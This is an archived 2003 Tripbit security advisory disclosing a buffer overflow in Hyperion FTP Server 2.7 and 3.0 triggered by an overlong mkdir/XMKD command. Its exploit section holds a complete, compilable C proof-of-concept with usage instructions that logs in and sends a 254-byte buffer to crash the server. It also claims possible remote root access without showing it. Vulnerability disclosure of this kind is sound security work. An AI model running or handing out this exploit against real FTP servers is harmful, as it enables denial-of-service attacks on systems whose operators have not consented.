TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0 contributed by: rushjo ================================================================================ Tripbit Security Advisory TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0 ================================================================================ PROGRAM: Hyperion FTP Server HOMEPAGE: http://www.mollensoft.com VULNERABLE VERSIONS: 2.7 and 3.0 (newest version) RISK: Medium/High IMPACT: Denial Of Service & possiable Remote-Root-Access RELEASE DATE: 2003-03 ================================================================================ TABLE OF CONTENTS ================================================================================ 1..........................................................DESCRIPTION 2..............................................................DETAILS 3..............................................................EXPLOIT 4............................................................SOLUTIONS 5........................................................VENDOR STATUS 6..............................................................CREDITS 7...........................................................DISCLAIMER 8...........................................................REFERENCES 9.............................................................FEEDBACK 1. DESCRIPTION ================================================================================ Hyperion FTP Server is an small FTP Server Program for Windows. It is made by Mollensoft and it supports all FTP Server commands. 2. DETAILS ================================================================================ ¤ Remote DoS : A security vulnerability in Hyperion FTP server allows remote attackers to cause the server to crash by executing a specific command (mkdir command) with a buffer of 251 and more bytes in length or more. The command can be issued to the FTP server either by a valid authenticated user or by an guest/anonymous account (if this is enabled). 3. EXPLOIT ================================================================================ This is an Proof of Concept Exploit of this Buffer Overflow Vul- nerability. NOTE: This is only for INFORMATION purposes and not for any destructive acts! /******************************************************************************* * * Denial of Service Attack for Mollensoft Hyperion FTP Server 3.0 * --------------------------------------------------------------- * * Note: This paper is ONLY for INFORMATION purposes and not for any * destructive acts! * * Note: Dieser Text ist ausschließlich NUR für Informationszwecke gedacht * und nicht für irgendwelche Zerstörerischen Taten! * * * Tripbit Security Development * Author: posidron * Website: tripbit.org * * Vulnerable Version: * + Hyperion 3.0 * + Hyperion 2.7 * * Compile: * bcc32 -lx ws2_32.lib hyperion.c * * Execute: * hyperion <host> [user] [pass] * * Thx: * MisterMoe, Rushjo, Tec, PeaceTreaty, seth * *******************************************************************************/ #include <stdio.h> #include <windows.h> #include <winsock2.h> #define A 0x41 #define PORT 21 #define MAX_BUFFER 255 #define MAX_PACKET_BUFFER 1024 int winsock(void); void usage(char *prog_name) { printf("Usage: %s <host> [user] [pass] \n", prog_name); exit(-1); } int main(int argc, char *argv[]) { char buffer[MAX_BUFFER], packet_buffer[MAX_PACKET_BUFFER]; long rc = winsock(); SOCKET s = socket(AF_INET, SOCK_STREAM, 0); SOCKADDR_IN addr; if(argc < 4) usage(argv[0]); if(s == INVALID_SOCKET) { printf("Can't start Socket!, Error code: %d\n", WSAGetLastError()); return 1; } if(rc != 0) { printf("Can't start Winsock!, Error code: %d\n", rc); return 1; } memset(&addr, 0, sizeof(SOCKADDR_IN)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr((char*)argv[1]); rc = connect(s,(SOCKADDR*)&addr, sizeof(SOCKADDR)); if(rc == SOCKET_ERROR) { printf("Can't connect!, Error code: %d\n", WSAGetLastError()); return 1; } printf("Connected to %s \n", argv[1]); printf("Preparing attack!\n"); recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0); sprintf((char *)packet_buffer,"USER %s\r\n",argv[2]); send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0); recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0); sprintf((char *)packet_buffer,"PASS %s\r\n",argv[3]); send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0); recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0); memset(buffer,A,MAX_BUFFER); buffer[MAX_BUFFER-1]=0; sprintf((char *)packet_buffer,"XMKD %s\r\n",buffer); send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0); recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0); Sleep(1000); shutdown(s, 2); closesocket(s); WSACleanup(); printf("Attack done!"); return 0; } int winsock(void) { WSADATA wsa; return WSAStartup(MAKEWORD(2,0), &wsa); } This error will produce an "Segmentatin fault" in the Hyperion FTP Server. 4. SOLUTIONS ================================================================================ No solution for the moment. 5. VENDOR STATUS ================================================================================ The vendor has reportedly been notified but no answer of to this report. 6. CREDITS ================================================================================ Discovered by posidron 7. DISLAIMER ====================================================================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 8. REFERENCES ====================================================================== - Original Version: http://www.tripbit.org 9. FEEDBACK ====================================================================== Please send suggestions, updates, and comments to: Tripbit Security Advisory http://www.tripbit.org rushjoat_private posidronat_private
This archive was generated by hypermail 2b30 : Fri Apr 04 2003 - 09:19:02 PST